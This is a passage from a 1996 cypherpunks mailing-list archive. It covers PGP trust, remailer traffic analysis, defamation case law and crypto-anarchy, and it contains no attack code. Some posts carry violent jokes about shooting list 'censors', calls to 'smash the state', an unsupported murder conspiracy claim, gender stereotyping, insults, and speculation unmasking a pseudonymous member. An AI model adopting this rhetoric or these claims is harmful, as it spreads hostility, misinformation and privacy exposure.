publicly prominent Internet people once or twice and have found them to be
remarkably decent, but I hope you will agree that my message on RRE is not
particularly congruent with theirs.  Yes, I organized a CPSR conference a
few years back, but look what's happening to CPSR.

So, at the end of the day, am I basically just another guy with a mailing
list?  When I started RRE, I assumed that surely by now the Internet
would be crawling with filter lists such as my own.  But even though some
other excellent filter lists do exist, including some (David Farber's,
for example) with many more subscribers than my own, my assumption hasn't
come close to being true.  Why is this?  I can think of a few reasons:

 * Limited access to the tools.  The hardware keeps getting faster, but
   the software for maintaining mailing lists isn't much better than it
   was in 1993.  It's still impractical for 95%+ of Internet users to
   maintain large mailing lists.  This is a scandal.

 * Flexibility of the tools.  The assumption that lots of people would
   start filter lists depended on another, implicit assumption: that
   the Internet only supports a limited number of interesting mechanisms.
   Lots of people are doing great things on the Internet, and they have
   shaped tools to fit their particular visions, which simply differ
   from mine.  Even the other filter lists vary widely in their traffic,
   contents, respect for copyrights, and amplitude of editorial voice.

 * Network externalities.  As I mentioned the other day, it's possible
   that once a list like RRE establishes a large subscriber base, other
   lists will have a hard time getting enough traction to compete.  This
   is because the success of such lists depends in part on the number of
   subscribers they have, and I got the subscribers first.  On the other
   hand, 4300 is a small fraction of the total world of Internet users.

 * Critical mass.  RRE is mostly about the social and political aspects
   of networking and computing.  This is a fashionable topic, and it
   is a topic likely to appeal to a large proportion of Internet users.
   Someone who wanted to run a filter list devoted to medical issues,
   for example, would be limited by the number of Internet users in
   the medical field.  On the other hand, one major early source of RRE
   messages was Gleason Sackman's high-volume filter list on education.

I wish I could say that the Internet affords freedom of the press to those
who don't own one.  But it's not true, not yet.  So maybe, on some very
tiny scale, I'm an Internet analog of Rush Limbaugh or Scott Adams.  Those
guys could hardly be more different on one level, but they also reflect an
important convergence.  Rush didn't invent talk radio with its structured
listener involvement; the innovation of his show was that it's basically
about his opinions.  Dilbert didn't invent the comic strip; his innovation
was to use the Internet to involve his readers in thinking up the ideas.
In each case, the result is a voice that seems on the surface like a
synthesis of the star's voice with that of his audience, and the fear
is that this result is a sham, giving just enough of an appearance of
audience involvement to authenticate the star as the Voice of the People.

Likewise, by forever soliciting subscribers' submissions while exercising
absolute editorial control, I can imagine that this list conveys a sense
of omniscience that has little basis in reality.  As a recovering know-it-
all, I can testify how addictive this position can be.  I can imagine how
this list can be perceived as more authoritative than it really is.  And
since perceptions of authority are largely self-fulfilling, I can appreciate
how an RRE message can do more damage than it has any right to.  I don't
really know for sure, nor is it mine to judge.  But I suppose I should err
on the safe side.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 18:51:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Excusing Judges for Knowing Too Much
In-Reply-To: <v03007801aea9223364b4@[207.167.93.63]>
Message-ID: <3285206F.63CD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 8:20 AM -0500 11/8/96, Jim Ray wrote:
> >been decided and appealed, because of this very possibility. I am already
> >concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt
> >to argue that "cypherpunk terrorists have been secretly trying to subtly
> >influence Kozinski's thinking, and that therefore he should be removed from
> >the case in favor of some judge who has no clue whatsoever about the 'Net,
> >encryption, anonymous remailers, etc." [I am sure the argument wouldn't be
> >put quite that way <g> but that's what the U.S. Attorney would mean.] There
> >is now a judge with some idea of these issues who will IMNSHO probably be
> >fair to "our" side. It is a rare opportunity, and I don't want to "blow it."

> If jurors can be dismissed for knowing "too much" about the O,J.
> case--knowing how to _read_ ensures this--then we are probably
> fast-approaching the point where judges are recused (or whatever the word
> is) from hearing cases where they've had any education whatsover on.

Maybe people should worry about how judges are *not* excused in certain cases.

The early word on the street was that the Japanese mob did Ron & Nicole, and *both*
judges look suspiciously like people who might want to *contain* certain information.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 17:10:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Announcement] Cypherpunks Shooting Club
In-Reply-To: <2.2.32.19961109154623.0069854c@smtp1.abraxis.com>
Message-ID: <koa6wD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


camcc@abraxis.com (Alec) writes:

> At 09:54 PM 11/8/96 -0800, you wrote:
> :By popular request, I am following up on the three year old idea of the
> :Cypherpunks Shooting Club.
> :
> :Bring your own firearm or use one of the ones provided.
>
> :-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
>
> How timely, especially after (or during) Flame Wars--96!
>
> How are targets to be determined, by lot?

I vote for the cypherpunk censors and their obsequitous lackeys.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 18:52:05 -0800 (PST)
To: "William.H.Geiger.III@mailhub.amaranth.com>
Subject: Re: Information [for new PGP user]
In-Reply-To: <199611092356.RAA22533@mailhub.amaranth.com>
Message-ID: <328523F4.3BC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


whgiii@amaranth.com wrote:
> In <3284BF7A.36E0@gte.net>, on 11/09/96
>    at 09:29 AM, Dale Thorn <dthorn@gte.net> said:
> >Yet another success (NOT!) story for PGP.  I wonder how many people on
> >this list would be willing to bet something *really* important to them on
> >the security of PGP?

> Dale you are truly a clueless shmuck.
> I would be truly intrested to see how many platforms and with how many
> different compilers the source code of YOUR program would work.

Tell ya' what, Mr. know-it-all.  From 1983 to 1988, I developed my own database program
and ported it to 7 different small-computer O/S's.  Much of the re-porting for updates
I handled with custom utilities I developed for the purpose.

I wouldn't claim to have expertise equal to some of those whizzes from IBM et al, but I
sure as hell know what it is to make code *very* portable.

Problem with PGP (apparently) is multiple sources (programmers) and just a helluva big
size for what it does (for most people).  Now, Win95, WinNT, etc. are also big for
what most people will use them for, but then again, those programs will *never* be
issued with source, and anyway, you don't have to bet the farm on their security.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "whgiii@amaranth.com" <William.H.Geiger.III@mailhub.amaranth.com>
Date: Sat, 9 Nov 1996 14:42:37 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Information [for new PGP user]
In-Reply-To: <3284BF7A.36E0@gte.net>
Message-ID: <199611092356.RAA22533@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <3284BF7A.36E0@gte.net>, on 11/09/96 
   at 09:29 AM, Dale Thorn <dthorn@gte.net> said:

>Yet another success (NOT!) story for PGP.  I wonder how many people on
>this list would be willing to bet something *really* important to them on
>the security of PGP?

Dale you are truly a clueless shmuck.

I would be truly intrested to see how many platforms and with how many
different compilers the source code of YOUR program would work.

-- 
-----------------------------------------------------------
whgiii@amaranth.com <William H. Geiger III>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 15:47:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mailing list liability
Message-ID: <199611092351.RAA01501@einstein>
MIME-Version: 1.0
Content-Type: text



Note:

Parts of the following are taken verbatim from (1) with some rewording on my
part to make the material flow better.




Cubby v Compuserve (1991)

The court reasoned,

"in essence an electronic, for profit library that carried a vast number of
publications and collected usage and membership fees from its subscribers in
return for access to the publications."

The court further ruled that Compuserve had no more editorial control over
Rumorville than "does a public library, book store, or newsstand, and it
would be no more feasible for Compuserve to examine every publication it
carries for potentialy defamatory statements than it would be for any other
distributor to do so."

The court also found, "A computerized database is the functional equivalent
of a more traditional news vendor, and the inconsistent application of a
lower standard of liability to an electronic news distributor such as
Compuserve than  that which is applied to a public library, a book store, or
a newsstand would impose an undue burden on the free flow of information.
Given the relevant First Amendment  considerations, the appropriate standard
of liability is whether it knew or had reason to know of the allegedly
defamatory Rumorville statements."

The court held that Compuserve was not liable because Compuserve was a
"distributor" and not a "publisher." The court concluded that because
Compuserve did not actively monitor the postings of the forum, it was a
distributor.

In summary, the court compared Compuserve to a bookstore selling the book
rather than the publisher of the book.



Cianci v New Times Publishing Co. (1980)

"one who repeats or othewise republishes defamatory matter is subject to the
liability as if he had originaly published it."



Lerman v Chuckleberry Publishing, Inc. (1981)

The court held that with respect to news vendors, book stores, and libraries
are not liable if "vendors and distributors of defamatory publications are
not liable if they neither know nor have reason to know of the defamation."



Stratton Oakmont v Prodigy (1995)

The critical issue in Prodigy was whether Prodigy exercised sufficient
editorial control over its computer bulletin boards to render it a publisher
with the same responsibilities as a newspaper or magazine.

The court reasoned that there were two distinctions in this case sufficient
to qualify Prodigy as a publisher. First, it held itself out to the public
and its members as controlling the content of its computer bulletin boards.
Second, Prodigy implimented this control through its automated software and
established guidelines  that board leaders were required to enforce. Prodigy
was clearly making decisions as to content. Such decisions constitute
editorial control.


(1)  ;login:, Oct. 1996, V21N5 pp27.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Date: Sat, 9 Nov 1996 01:11:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: allow me to state the obvious....
Message-ID: <9610098475.AA847591051@smtp-gw.cv62.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain


i am your average joe who uses the computer for work and e-mail and the 
occasional jaunt into the internet. going along reading this whole 
crypto-anarchy thing makes me want to cry. the whole point of cryptography 
is getting info from my eyes to yours. period. you can say that "illegal" 
information passes along the internet, but hello people - illegalities have 
been going on since long before the invention of the computer (or even the 
notion of cryptography - if i may stop to point out the obvious).  the only 
reason _i_ use encrypted stuff is because i don't want my nosy sysadmin 
reading my mail.  its that simple.  think about it.  how many times is your 
e-mail handed off?  when sent it naturally follows the most convenient path 
to its destination, and even anonymous re-mailers (can) keep a hard copy of 
the messages that cross their connections with the original address 
included.  you can go off into spoofing address and so on, but your average 
joe may (or may not) have the time or knowledge (much less the motivation) 
to do that.  keep that in mind before you go saying that crypto is a 
good/bad thing. 

---------------------- SUCRUM22@cv62.navy.mil -----------------------
  a calculated risk based on the possible consequence of an action
 is better than a haphazard one based on poor judgment or ignorance
---------------------------------------------------------------------
Don't confuse my views with those of the DoD or the United States Navy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 9 Nov 1996 17:58:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Another possible remailer attack?
In-Reply-To: <Pine.BSF.3.91.961109134348.182B-100000@bitbucket.edmweb.com>
Message-ID: <v03007800aeaae66a770f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 PM -0800 11/9/96, Steve Reid wrote:
...
>You want to know if Dimitri is the person regularly posting these
>messages. So, you use your powers as ISP to block his access to all
>remailers. If the public messages suddenly stop then you can be reasonably
>certain that Dimitri was sending them.

I'm not following something...just how to your "powers as ISP" affect a
remailer in, say, Holland, or one for that matter on another ISP? (As a
matter of fact, I expect the "compliance rate" with your request would be
something less than 10%.)

>I expect this would work even against DC nets.

One presumption about nodes in DC-nets is that they are even more
crypto-savvy than routine mixes, so I doubt even more strongly than nodes
in a DC-Net would obey your recommendations to source-block any particular
user from entering the DC-net.

(And all your hypothetical "Dimitri" has to do is to use a remailer outside
the DC-net to anonymize his identity, or to use Unix/Sendmail hacks to
obscure the name, etc.)

On the larger issue of foiling remailer networks by analyzing message
sent--message received statistics, this is never going to go away
completely. Just as the Nazis could isolate spy transmitters by selectively
turning off electricity to different neigborhoods, so, too, can various
in-out correlations be analyzed to deduce _probable_ sources of some
messages. Given enough traffic. A SIGINT problem similar to submarine
warfare Bayesian statistics problems.

-Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 9 Nov 1996 18:42:38 -0800 (PST)
To: "Dale Thorn" <stewarts@ix.netcom.com>
Subject: Re: Information [for new PGP user]
Message-ID: <19961110024029578.AAA189@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 07 Nov 1996 07:08:52 -0800, Dale Thorn wrote:

>> >> > I'm a new Cyberpunk!
>> Probably wearing a set of Ono-Sendai eyeballs....
>> >> > Last,  I would like to know once and for all,  is PGP compromised,  is
>> >> > there a back door, and have we been fooled by NSA to believe it's secure?

>> You can read and compile the source code yourself.

>Really?  All 60,000 or so lines, including all 'includes' or attachments?

>I'll bet you can't find 10 out of 1,000 users who have read the total source,
>let alone comprehended and validated it.


That's not necessary - it's the fact that it's possible that matters;  most
of us are content to trust the various people who actually have.  However,
I'd probably be inclined to look into it seriously if I was going to use it
on anything incriminating or potentially linked to my checkbook...


#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 9 Nov 1996 18:52:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: His and Her Anarchies
In-Reply-To: <v03007801aeaa7e5d06d0@[207.167.93.63]>
Message-ID: <32854189.48DF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 6:59 PM -0500 11/8/96, jbugden@smtplink.alis.ca wrote:
> >I think it relates to crypto policy via policy in general, also to both the
> >libertarian and the inevitable cryptoanarchy argument we are currently tossing
> >about and brought to mind a comment a few months back from Tim about how the
> >occasional female members of this list tended to not make sense a lot of the time.

> Well, I think there clearly _is_ a gender gap on these sorts of issues.
> While we certainly have a handful of women subscribers, we have few active
> women posters, and none of the "ringleaders" are women.
> The woman I am currently seeing is a case in point. She occasionally wants
> to hear what interests me, in my "other life," and I have tried to explain
> the stuff we talk about here.

[snip]

> I suspect there may be a biological component to this. Many males enjoy
> adrenaline rushes, whether by bungee cord jumping, robbing houses, or
> plotting to smash the state. Many females have _other_ interests. Women I
> have known have generally not understood why I would be willing to be so
> upfront about my radical views and why I am apparently willing to "risk it
> all" for the adrenaline rush of being involved in this battle.

[mo' snip]

Adrenaline is too simple an explanation for computer gender gap.  Many, many women
like fast cars, motorcycles, etc. to ride in at least, if not to drive themselves.

Some women like being around men, for various reasons, security and so on, but they
don't want to be like men, so they don't try to act the same way.  While many, many
women have harrassed me on the road for my driving, they (unlike men, w/o exception)
have *never* tried to threaten me directly, as have hundreds of men.

As far as the risk goes, men are much more likely to get up and leave a place, and
possibly never come back, as are women.  Maybe this is the domestic instinct thing,
I don't know a whole lot about that.  I would suggest to any man that if he lived
in a society where a whole class of humans (i.e., female) were more aggressive and
confrontational, more domineering, etc. than he and nearly every other man he knew,
he would probably learn how best to get along with that other class of persons without
constantly butting heads with them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sat, 9 Nov 1996 16:48:47 -0800 (PST)
To: Black Unicorn <jimbell@pacifier.com>
Subject: Re: RICO - (Was: Group order for Secret Power)
Message-ID: <199611100048.SAA02758@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> At 03:13 AM 11/8/96 -0500, Black Unicorn wrote:
> >On Thu, 7 Nov 1996, jim bell wrote:
> 
> >> But the odd thing is, the one entity we can't seem to attack using RICO is 
> >> the Federal government, and probably most other governments levels.  Looked 
> >> at purely objectively, it should be easy to demonstrate that the Federal 
> >> government (and its representatives) have engaged in plenty of crime as a 
> >> pattern of activity, and certainly enough to rise to the level of the 
> >> standards of RICO. (It takes only a few instances of such crime satisfy the 
> >> standards of RICO.)
> >
> >Incorrect.  Employees of the Federal Government can be, and have been,
> >prosecuted under RICO.  Many political corruption cases involve some RICO
> >aspects.  This should make Mr. Bell a big fan of the statute, unless he
> >just likes the flash of murdering officials instead.
> 
> No, I meant the ENTIRE government  Not just individual government officials. 
>  Remember, RICO is _supposed_ to apply to any organization with a pattern of 
> criminal activity, and has been used (in fact, probably mostly used) against 
> organizations where many of the members are "merely" employees, quite 
> analogous to the Federal government.  If RICO applies to anything, it should 
> apply to the Feds, and that means conviction of the entire organization if 
> it or its employees have a pattern of illegal activity.   Since RICO only 
> requires a relatively tiny number of criminal acts to meet its standards, it 
> should not be difficult to show enough criminality.

Jim,

If it seems this easy to you, please draft the pleadings.  I would 
strongly suggest at least a basic civil procedure book.  Non-specific 
pleadings?  That couldn't be a problem.

And upon Peter's recommendation, thank you Jim for doing this brave 
service for the cpunks cause.  

"Canary in a coal mine, going on down, down..."

Matt


> 
> 
> Jim Bell
> jimbell@pacifier.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
=lkx1
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 9 Nov 1996 19:03:37 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <19961110030022625.AAA192@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996 16:43:23 -0800, Timothy C. May wrote:

>* "Legitimate needs." The whole notion Peter raises of banning cryptography
>is fraught with problems. Are businesses to be told that all communications
>are to be in the clear? Or is Peter's point that some form of GAK will be
>used?

I'd love to see the government try to tell big business that they can't
protect, say, electronic transactions.  That'd get a lot of rented senators
in action...

>(If the latter, then of course we are back to an even better form of
>"stego" than stego itself: superencrypt before using GAK. Unless the
>government samples packets randomly and does what they say they will do to
>open a GAKked packet--e.g., get a court order, go to the escrow key
>holders, etc.--then how will they know if a message is superencrypted? And
>what if a GAKked message contains conventional _codes_? Are shorthand codes
>such as business have long used--"The rain in Rome is warm this month"--to
>be illegal?)

Also:   "Am I being investigated for any crime?"
	"Then how do you know it's been superencrypted - I thought you could only
get access with a 	 	  warrant?"

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sat, 9 Nov 1996 17:22:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: No More
Message-ID: <199611100121.TAA12178@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Nov 09 19:21:54 1996
> I want take off mail list

Oooh.  Gotta be a few good stego bits in that one.

- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Better living through chemicals" - unattributed
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMoUuNTVTwUKWHSsJAQHdYgf+OKNAADSBz+qpjD+u+qqZWPUmAuyQhUGd
jsn/TQG/1gXctoAin5S3VYha1uzt2Pd5xNqUZfpjzP99qDalbtElaROfSo1MoWqj
lL1oencAMW9lIfNNQVzRj2B+eHfpBUo33/Fq25xRktPCAgwhrU6Q1Bc2q4p8nxbG
d65iexqo8CYwMzwnGarl+D7OKXaLZtsZt1JIHcc70KyTB5OaRaVK7pGcu6YTdAS4
0jLfxHJZuDt6p0AcWm+ie2yqRkwEKryB8AFQ6r9wFoCFp0VNuh6dxmY2qn15A9BD
D/BjreSvQcFCcctHOuTHZDTuMPAZZTWCaR/ImlLLy3iCMcICjCRMJQ==
=wrw5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William F. Towey" <liam@webspan.net>
Date: Sat, 9 Nov 1996 16:52:54 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: allow me to state the obvious....
In-Reply-To: <v03007805aeaa8b2a08c2@[207.167.93.63]>
Message-ID: <32852789.EB0@webspan.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 5:57 PM -0500 11/9/96, SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:
> >i am your average joe who uses the computer for work and e-mail and the
> >occasional jaunt into the internet. going along reading this whole
> >crypto-anarchy thing makes me want to cry. the whole point of cryptography
> ...
> 
> Well, then don't read what we have to say. Unsubscribe from the list or use
> filters. That you are happy just to use your computer for work and e-mail
> and occasional jaunts into the Internet and that discussions of other
> topics bother you should be a clear indication you're probably on the wrong
> list.
> 
> Having a "navy.mil" domain probably is another reason, unless you are only
> hear to monitor our discussions of using cryptography to undermine the
> state, to liberate military secrets with BlackNet and the Information
> Liberation Front, and to punish the millions of those in the
> military-industrial complex who have so richly earned their eventual
> punishments.
> 
> Smash the State.
> 
> --Tim May
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."


Please tell me how to unsubscribe from this list.  I have tried several
times to no avail.  Thanks, Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 20:30:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pseudo-law on the list and libel (fwd)
In-Reply-To: <199611091721.LAA00907@einstein>
Message-ID: <sXk6wD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@ssz.com> writes:
> Vulis was unpopular he was not distruptive. At NO time did he interfere with
> the normal operation of the list software or prevent submissions or
> remailings.

That depends. To Timmy May, "normal operations" of this mailing list means
his being able to post lies, fabrications, and personal attacks, and his
victims not being able to respond and to call him a liar that he is. To refute
Timmy's lies and to expose him as a forger is therefore "disruptive".

I again refer you to the false complaint sent by the lying shyster from
Florida to postmaster@bwalk.dm.com. The self-described libertarian said
he already killfiled me but wanted me silenced anyway.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 20:32:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <199611092044.FAA19938@ns.barrier-free.co.jp>
Message-ID: <V5k6wD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hayashi_Tsuyoshi <take@barrier-free.co.jp> writes:

> On Sat, 09 Nov 1996 10:47:28 -0800, stewarts@ix.netcom.com said:
>  >At 01:29 AM 11/9/96 -0800, John Gilmore <gnu@toad.com> wrote:
>  >>ask questions, etc.  To join the list, send mail to:
>  >>	linux-ipsec-REQUEST@clinet.fi
>  >>The email should contain a single line that just says:
>  >>	subscribe
>  >
>  >Actually, it needs to say
>  >        subscribe linux-ipsec
>
> Probably, it needs to send mail to:
> 	Majordomo@clinet.fi
>
> ///hayashi

Moral: John Gilmore can't be trusted.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 20:30:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: His and Her Anarchies
In-Reply-To: <v03007801aeaa7e5d06d0@[207.167.93.63]>
Message-ID: <meL6wD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> rants:

> (And saying I am "prepared," and pointing to the loaded .45 I keep in case
> the Midnight Raiders hit my house is even less reassuring to them! In at
> least one case I never saw the woman again. Rationally, I can't say I
> disagree with their reaction, from a payoff matrix standpoint. But
> something in we males craves this kind of confrontation. The leaders of the
> revolutions in the past were almost always me.  ...
                                             ^^

Now the cypherpunk crackpot is into reincarnation? He thinks he was
Pancho Villa in a former life? :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 9 Nov 1996 17:46:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <v0300780eaeaadd57e5d4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 pm -0500 11/9/96, Peter Hendrickson wrote:
>We are hardly operating in a hostile environment.  Yet, somebody
>who has apparently gone to some effort to have an anonymous
>identity has been exposed.  The implications of this are worth
>considering.

Nope. Sorry, Pete. Hope you didn't throw out your sholder, swinging for the
fences like that. ;-).


The name "S. L. vonBernhardt" is just another pseudonym of Unicorn's, and
as such, is just another level of redirection, in a rather, hrm,
redirected, life, I would wager.

For what it's worth, the DCSB speaker process is as follows: The speaker
pings me and offers to speak. I say, "Cool. Send me a paragraph about
yourself and another one about your talk, and I'll bounce it off the
program committee." (The program committee is the first 6 or 7 people who
said they wanted to speak when we started DCSB last year. It was my way of
making them sing for their supper. They sing pretty well, given the caliber
of speakers we've had. ;-).)

So, Uni sends me his two paras, which I forward to the program committee,
who do backflips, 'cause Uni's about an 11 on a 10-point "kewl" scale. And
that's it.

When blurb time comes for the talk, I copy and paste said two paras into a
piece of boilerplate, tweak here and there, spam the planet, and voila!, a
DCSB announcement blurb is history. Except of course when the speaker has
been, er, loquacious, and his two paras require editing down, which, in
Uni's case, he wasn't, so I didn't. Except his aside to me that "S. L.
vonBernhardt" is Yet Another Pseudonym.

In short, I sent out what Unicorn sent me. No skulduggerous efforts at
outing him were attempted.


You do have a nice swing, though. Next time, I'll put one over the plate
where you can hit it. :-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 10 Nov 1996 01:13:19 -0800 (PST)
To: unicorn@schloss.li
Subject: nym blown? (Re: DCSB: Money Laundering -- The Headless Horseman of the Infocalypse)
In-Reply-To: <v03007822aeaa5af8a26e@[206.119.69.46]>
Message-ID: <199611092052.UAA00391@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rah writes:
>                  The Digital Commerce Society of Boston
> 
>                               Presents
>                            "Black Unicorn"
> 
>                          "Money Laundering --
>                The Headless Horseman of the Infocalypse"
> 
> S. L. vonBernhardt, <mailto:unicorn@schloss.li>, is an attorney, a member
> of the board of directors of two European financial institutions, author
> of "Practical and Legal Problems Confronting the Asset Concealer in
> Relation to Offshore Financial and Corporate Entities" and a former
> member of the intelligence community.

S L von Bernhardt == Black Unicorn, or do you "have that covered" too uni?

(I noticed you said you "had it covered" when you reported to the list
on a meeting you attended which had a published list of attenders, and
someone pointed this out).

> He is currently working to develop and preserve institutions
> dedicated to traditional standards of financial privacy.

A worthwhile occupation, to be sure.

> [...]
> 
> No cameras, please.

So is von Bernhardt another nym?  If not cameras are a small
consideration, surely?

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




